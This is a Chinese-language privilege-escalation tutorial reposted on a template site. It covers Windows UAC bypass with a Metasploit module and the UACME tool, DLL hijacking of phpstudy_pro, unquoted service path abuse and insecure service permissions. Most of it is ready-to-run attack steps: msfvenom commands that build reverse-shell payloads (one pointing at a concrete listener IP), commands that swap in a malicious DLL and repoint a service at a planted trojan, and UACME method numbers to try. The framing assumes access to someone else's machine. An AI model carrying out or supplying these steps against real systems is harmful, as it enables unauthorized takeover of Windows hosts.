【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限

这篇具有很好参考价值的文章主要介绍了【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

权限提升基础信息

1、具体有哪些权限需要我们了解掌握的?

后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等

2、以上常见权限获取方法简要归类说明?

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入

网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell

数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入

接口权限:SQL注入,数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入

系统权限:高危系统漏洞直达或网站权限提升转入、数据库权限提升转入,第三方转入等

域控权限:高危系统漏洞直达或内网横向渗透转入,域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?

后台权限:

常规WEB界面文章分类等操作,后台功能可操作类

网站权限:

查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。

数据库权限:

操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限:

后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。

系统权限:如同在你自己操作自己的电脑一样

域控权限:如同在你自己操作自己的虚拟机一样

 

 

演示:uac提权

前提:已获取目标本地用户权限

使用msf模块提权

1.上传木马反弹shell回来的时候测试一下getsystem,发现无法提权。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

2.启动msf,选择UAC绕过模块。

此处测试是针对UAC被设置为高等级的情况,使用的是钓鱼模块,运行后目标主机弹窗,需要目标点击确定才能触发。

建议优先使用其他模块:search uac   #搜索uac模块

执行命令:

use exploit/windows/local/ask    #使用钓鱼模块
sessions         #查看后台进程
set session 1    #选择进程

set lport 5555   #设置监听端口

run  #启动

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

3.再次执行 getsystem 提权命令,成功提权。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

4.如果还是无法提权,可以尝试其他uac模块。

 

使用UACME项目提权

介绍:UACME 是一款专门绕过uac的项目,目前已经支持了77 种绕过 UAC 的方法。支持Windows 7/8/8.1/10/11系统版本,某些方法也适用于服务器版本。

下载:https://github.com/hfiref0x/UACME

使用:下载UACME项目到本地后,使用最新版 Visual Studio 工具对其进行编译,然后将编译好的exe程序上传到目标系统运行即可。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

使用命令:Akagi64.exe 绕过方法编号  #程序将从 system32 文件夹执行提权的 cmd.exe

使用命令:Akagi64.exe 绕过方法编号 木马路径  #运行指定的程序

实用编号:23、41、61、62

1.执行:whoami /all 查看当前用户权限,只有如下权限。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

2.执行绕过uac程序,使用的是编号62绕过方法,系统是win11。

命令:Akagi64.exe 62

成功唤出弹窗,再次使用 whoami /all 查看权限,发现多出了很多权限。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

3.使用命令:Akagi64.exe 62 shell.exe  执行msf木马程序,msf设置监听。

不行就多尝试几种编号。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

msf成功接收到shell,执行 getsystem 提权命令,成功提权。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

 

 

DLL劫持提权

前提:已获取web shell权限

介绍:Windows程序启动的时候需要运行DLL文件,攻击者可以将程序启动时要运行的dll文件替换为同名的恶意脚本文件来提权。

Windows查找DLL文件的顺序如下:

1、应用程序加载的目录

2、C:\Windows\System32

3、C:\Windows\System

4、C:\Windows

5、当前工作目录Current Working Directory,CWD

6、在PATH环境变量的目录(先系统后用户)

演示开始:

过程:信息收集-进程调试-制作dll恶意脚本并上传-替换dll文件-启动应用后成功

1.获取目标web shell权限,查看文件,发现存在一个phpstudy_pro程序,应用程序目录下存在dll文件。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

2.在本地下载一个 火绒剑-互联网安全分析软件 和目标应用程序:phpstudy_pro。

下载火绒剑:https://github.com/anhkgg/anhkgg-tools

运行phpstudy_pro启动进程,使用火绒剑-互联网安全分析软件查看phpstudy_pro程序进程中运行的dll文件。

一般选择未知文件或者数字签名文件,因为系统文件可能没有权限操作。

发现运行了一个:msvcp140.dll

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

3.服务器安装一个msf,执行生成dll恶意文件命令。

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=监听ip  lport=监听端口 -f dll -o 文件名.dll

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

4.将应用程序目录下的原生msvcp140.dll文件改名,然后将生成的msvcp140.dll恶意文件上传。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

5.启动msf监听,等待目标启动phpstudy_pro应用程序,触发msvcp140.dll恶意文件,反弹shell。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

6.接收到反弹shell之后,成功获取到目标管理员用户权限。执行 getsystem 成功将权限提升至system系统权限。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

 

 

利用"不带引号的服务路径"提权

前提:需要在C盘等目录引用上传权限(如:获取到win本地用户权限)

介绍:当 Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是如果服务的二进制路径未包含在引号中,有空格的目录就会认为是文件加参数 ,则操作系统将会执行服务路径中空格前的第一个实例。

演示开始

过程:检测筛选符合的服务--生成木马并上传--启动服务--自动调用木马

1.执行命令检测当前系统中不带引号的服务路径中有空格的服务路径。

执行命令:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

2.获取到服务路径空格之前的是program。服务器安装msf,执行命令生成同名木马文件。

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=43.134.241.193  lport=4444 -f exe > program.exe

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

3.服务器启动msf,配置和启动监听,等待反弹shell。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

4.上传同名的program.exe木马文件到目标C盘根目录。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

5.执行命令启动DriverGenius Core Service 服务就会触发木马文件,攻击者直接就获取system权限。

执行命令:sc start "服务名(DriverGenius Core Service)"

成功获取system权限:

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

利用"不安全的服务权限"提权

介绍:由于管理配置错误,用户可能对服务拥有过多的权限,例如:可以直接修改服务路径指向恶意程序。

1.下载accesschk工具,将accesschk.exe程序上传到目标系统目录,执行命令查看有权限更改服务配置的服务。

下载:https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

执行命令:accesschk.exe -uwcqv "administrators" *      #查看administrators用户下的服务项

服务权限为:SERVICE_ALL_ACCESS或SERVICE_QUERY_CONFIG 的就符合要求,可以更改服务配置。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

2.使用msf生成木马程序,将木马上传到目标系统目录。

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=监听ip  lport=监听端口-f exe > 木马名.exe

3.启动msf开启监听,等待接收shell。

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限,权限提升,windows,安全,oracle

4.执行命令将指定服务的路径更改为上传木马的路径。

命令:sc config "服务名" binpath="木马绝对路径"

5.然后执行命令启动服务,触发木马程序。

命令:sc start 服务名

6.msf成功接收到shell,执行 getuid 查看权限直接就是system权限文章来源地址https://www.toymoban.com/news/detail-688411.html

更多提权方式请看:权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC_xiaoheizi安全的博客-CSDN博客

到了这里,关于【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 操作系统权限提升(三)之Windows系统内核溢出漏洞提权

    系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! 溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出,提权

    2024年02月14日
    浏览(35)
  • 利用MSF溢出漏洞提权windows server2012

    使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权。 在此之前已经上传一句话取得admin权限,在自己虚拟机做演示,大家通常取得的权限可能会比admin低,但也是可以进行以下提权的,这里要把目标提权至system权限。 kalil inux Windows S

    2024年01月24日
    浏览(47)
  • 系统提权之:Unix 提权

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 通常我们在获取到一个 Webshell 的时候,一般权限都是

    2024年02月08日
    浏览(41)
  • 权限提升:网站漏洞(提权思路.)

    权限提升简称 提权 ,由于 操作系统都是多用户操作系统 , 用户之间都有权限控制 ,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通

    2024年02月05日
    浏览(41)
  • 权限提升:网站后台.(提权思路.)

    权限提升简称 提权 ,由于 操作系统都是多用户操作系统 , 用户之间都有权限控制 ,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通

    2024年02月01日
    浏览(32)
  • 操作系统权限提升(十九)之Linux提权-SUID提权

    系列文章 操作系统权限提升(十八)之Linux提权-内核提权 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获

    2024年02月14日
    浏览(40)
  • 操作系统权限提升(十八)之Linux提权-内核提权

    内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节: 1、对目标系统进行信息收集,获取到系统内核信息及版本信息; 2、根据内核版本获取其对应的漏洞以及EXP 3、使用找到的EXP对目标系统发起攻击,完成提权操作 查看Linux操作系统的内核版本

    2024年01月16日
    浏览(44)
  • 权限提升WIN篇(腾讯云,CS,MSF)

    操作系统版本 ver,systeminfo 漏洞补丁信息 systeminfo 操作系统位数 systeminfo 杀软防护 tasklist /svc 网络 netstat -ano,ipconfig 当前权限 whoami 根据前面的信息收集中的系统版本,位数和补丁情况筛选出合适的EXP 根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作 如

    2024年02月07日
    浏览(38)
  • Windows UAC权限详解以及因为权限不对等引发的若干问题分享

    目录 1、什么是UAC? 2、微软为什么要设计UAC? 3、标准用户权限与管理员权限 4、程序到底以哪种权限运行?与哪些因素有关? 4.1、给程序设置以管理员权限运行的属性 4.2、当前登录用户的类型 5、案例1 - 无法在企业微信聊天框中启动安装包程序 6、案例2 - 使用Windbg时可能会

    2024年02月04日
    浏览(41)
  • Linux权限提升—定时任务、环境变量、权限配置不当、数据库等提权

      在上篇文章中提到了Linux权限提升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为提到的内容进行补充,至于其它内容可参考上篇文章。   Linux权限提升—内核、SUID、脏牛等提权   这里提一下,之前在设计找EXP都是使用自动化进行编译,但是就会出现

    2023年04月08日
    浏览(102)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包